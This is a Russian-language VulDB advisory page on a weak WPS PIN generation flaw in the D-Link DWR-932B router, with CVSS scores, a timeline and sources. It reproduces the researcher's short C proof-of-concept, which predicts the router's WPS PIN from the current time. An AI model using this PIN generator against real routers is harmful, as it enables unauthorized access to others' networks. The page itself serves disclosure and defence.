D-Link DWR-932B WPS Generation слабая аутентификация

CVSS Meta Temp ScoreТекущая цена эксплойта (≈)Балл интереса CTI
4.9$0-$5k0.00

СводкаИнформация

Уязвимость была найдена в D-Link DWR-932B. Она была классифицирована как проблематичный. Поражена неизвестная функция компонента WPS Generation. Осуществление манипуляции приводит к слабая аутентификация. Кроме того, имеется доступный эксплойт. Рекомендуется скорректировать конфигурационные настройки.

ПодробностиИнформация

Уязвимость была найдена в D-Link DWR-932B. Она была классифицирована как проблематичный. Поражена неизвестная функция компонента WPS Generation. Осуществление манипуляции приводит к слабая аутентификация. Декларирование проблемы с помощью CWE приводит к CWE-287. Данный баг был выявлен 04.12.2015. Информация о слабости была опубликована 28.09.2016 автором Pierre Kim как Mailinglist Post (Bugtraq). Консультация доступна по адресу seclists.org.

Техническая информация отсутствует. Уровень популярности этой уязвимости ниже среднего значения. Кроме того, имеется доступный эксплойт. Эксплойт опубликован и может быть использован. На текущий момент стоимость эксплойта может быть примерно USD $0-$5k.

Это объявлено как Доказательство концепции. Эксплойт доступен по адресу seclists.org. Уязвимость оставалась в статусе непубличного эксплойта нулевого дня не менее 299 дней. В случае 0-day эксплойта, предполагаемая цена на подпольном рынке была около $5k-$25k. Исходный код эксплойта:

#include <stdio.h>
#include <stdlib.h>
#include <time.h>



int main(int    argc,
		 char   **argv,
		 char   **envp)
{
  unsigned int  i0, i1;
  int           i2;


  / the seed is the current time of the router, which uses NTP... /
  srand(time(0));


  i0 = rand() % 10000000;
  if (i0 <= 999999)
	i0 += 1000000;
  i1 = 10 * i0;
  i2 = (10 - (i1 / 10000 % 10 + i1 / 1000000 % 10 + i1 / 100 % 10 + 3 *
	   (i1 / 100000 % 10 + 10 * i0 / 10000000 % 10 + i1 / 1000 % 10 + i1 / 10 % 10))
        % 10) % 10 + 10 * i0;


  printf("%d\n", i2 );


  return (0);
}
В уведомлении отмечается:
The PIN generated by the router is weak as it is generated using this "strange" reverse-engineered algorithm.

Рекомендуется скорректировать конфигурационные настройки.

ПродуктИнформация

Поставщик

Имя

Лицензия

Веб-сайт

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.9

VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

ЭксплуатацияИнформация

Класс: слабая аутентификация
CWE: CWE-287
CAPEC: 🔍
ATT&CK: 🔍

Физический: Частично
Локальный: Да
Удалённый: Нет

Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: Pierre Kim
Скачать: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-DayРазблокироватьРазблокироватьРазблокироватьРазблокировать
СегодняРазблокироватьРазблокироватьРазблокироватьРазблокировать

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: Config
Статус: 🔍

0-дневное время: 🔍
Задержка эксплуатации: 🔍

ХронологияИнформация

04.12.2015 🔍
15.06.2016 +194 дни 🔍
16.06.2016 +1 дни 🔍
28.09.2016 +104 дни 🔍
28.09.2016 +0 дни 🔍
28.09.2016 +0 дни 🔍
27.04.2019 +941 дни 🔍

ИсточникиИнформация

Поставщик: dlink.com

Консультация: seclists.org
Исследователь: Pierre Kim
Статус: Не определено

GCVE (VulDB): GCVE-100-92233
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍

ВходИнформация

Создано: 28.09.2016 16:47
Обновлено: 27.04.2019 16:11
Изменения: 28.09.2016 16:47 (50), 27.04.2019 16:11 (1)
Завершенный: 🔍
Cache ID: 216::103

Several companies clearly confirm that VulDB is the primary source for best vulnerability data.

Обсуждение

Комментариев пока нет. Языки: ru + be + en.

Пожалуйста, войдите в систему, чтобы прокомментировать.

ПредыдущийОбзорДалее

Interested in the pricing of exploits?

See the underground prices here!